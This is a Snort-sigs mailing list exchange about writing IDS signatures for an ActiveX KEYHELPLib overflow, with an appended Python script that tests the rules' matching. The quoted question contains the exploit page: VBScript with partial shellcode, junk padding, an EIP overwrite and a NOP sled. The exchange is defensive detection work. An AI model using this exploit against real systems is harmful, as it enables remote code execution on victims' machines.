[Snort-sigs] Problem writing a sig to capture vbscript unescape sequence

Nathan Benson nathan at ...3679...
Fri May 18 17:16:11 EDT 2012


Hi Bob,

I was able to successfully detect the content you were looking for using
2.9.2.1, 2.9.2.2, and 2.9.2.3 all with the default snort.conf using the
rules below.

I hope this is of some help.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX
KEYHELPLib overflow attempt"; flow:to_client,established; file_data;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only;
pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi";
classtype:attempted-user; sid:1010000; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX
KEYHELPLib overflow attempt"; flow:to_client,established; file_data;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only;
content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase;
classtype:attempted-user; sid:1010001; rev:1;)

Here they are again unfolded:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"ActiveX KEYHELPLib overflow attempt"; \
flow:to_client,established; \
file_data; \
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \
pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi"; \
classtype:attempted-user; \
sid:1010000; rev:1; \
)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"ActiveX KEYHELPLib overflow attempt"; \
flow:to_client,established; \
file_data; \
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \
content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase; \
classtype:attempted-user; \
sid:1010001; rev:1; \
)

10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:23031
***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:23031
***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:5414
***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:5414
***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20

On Fri, May 18, 2012 at 1:52 PM, Bob Huber <roberthuberjr at ...144...> wrote:

> I'm trying to write a sig for this ActiveX overflow:
>
> <html>
> <body>
> <object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C'
> id='KEYHELPLib' />
> </object>
> <script language='vbscript'>
> //executing calc
> scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
> & _
>              ...SNIP...
>              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
> jnk = string(537,"A")
> eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
> nop = string(16,unescape("%90"))
> mapID=1
> pstrChmFile= jnk + eip + nop + scode
> pstrFrame="aaaaaaaa"
> 'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
> KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
> </script>
> </body>
> </html>
>
> The problem I'm having is trying to get a content match off of the line -
>    eip = unescape("%67%41%41%7e")
> I can't figure out how to match that content.  I'm running both 2.8.5 and
> 2.9.2.  I was assuming it would see the <script> tag and it would try to
> decode javascript, and maybe that was the problem.  I've tried file_data,
> I've tried pkt_data. I've turned off javascript normalization, I've turned
> off extended_response_inspection.  No luck.
>
> Any help appreciated.
>
> Bob
>
>
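The two rules above take different routes to the same line: the `content` option spells the quotes as `|22|` hex escapes, while the `pcre` option uses `\x28`/`\x22` escapes plus a backreference so either quote style matches. The script below is an added example (not from the thread or from Snort itself): it parses the rule's content string into the bytes Snort would search for, runs the rule's PCRE with Python's `re`, and checks both against constructed sample lines, so a signature author can confirm what each option does and does not match before loading it into Snort. The `nocase` emulation via ASCII lowercasing is an assumption for the test, not Snort's matcher.

```python
import re

# The rule's PCRE, unchanged; Snort's /smi flags map to re.S | re.M | re.I.
EIP_PCRE = re.compile(
    rb"eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29",
    re.S | re.M | re.I,
)

# The rule's content string, exactly as written between its quotes.
EIP_CONTENT = "eip = unescape(|22|%67%41%41%7e|22|)"


def snort_content_to_bytes(content: str) -> bytes:
    """Turn Snort content syntax into bytes: text outside |...| is literal,
    text inside |...| is a run of space-separated hex byte values."""
    out = bytearray()
    for i, chunk in enumerate(content.split("|")):
        if i % 2 == 0:
            out += chunk.encode("latin-1")
        else:
            out += bytes(int(h, 16) for h in chunk.split())
    return bytes(out)


def content_matches(payload: bytes) -> bool:
    """Emulate content + nocase as an ASCII case-insensitive byte search."""
    return snort_content_to_bytes(EIP_CONTENT).lower() in payload.lower()


def pcre_matches(payload: bytes) -> bool:
    """Emulate the rule's pcre option against the same buffer."""
    return EIP_PCRE.search(payload) is not None


# Constructed sample payloads (not captures): the line from the thread plus
# variants that the fixed content string alone cannot match.
SAMPLES = {
    "exact":        b'eip = unescape("%67%41%41%7e")',
    "single_quote": b"eip=unescape('%67%41%41%7e')",
    "mixed_case":   b'EIP = UNESCAPE("%67%41%41%7E")',
    "mismatched":   b'eip = unescape("%67%41%41%7e\')',  # quote style differs
}


def evaluate(samples=SAMPLES) -> dict:
    """Map sample name -> (content option matches?, pcre option matches?)."""
    return {n: (content_matches(p), pcre_matches(p)) for n, p in samples.items()}


if __name__ == "__main__":
    for name, (c, p) in evaluate().items():
        print(f"{name:13} content={c!s:<5} pcre={p}")
```

Run it to see that only the PCRE catches the single-quoted and whitespace-free variant, while neither option fires when the opening and closing quotes differ.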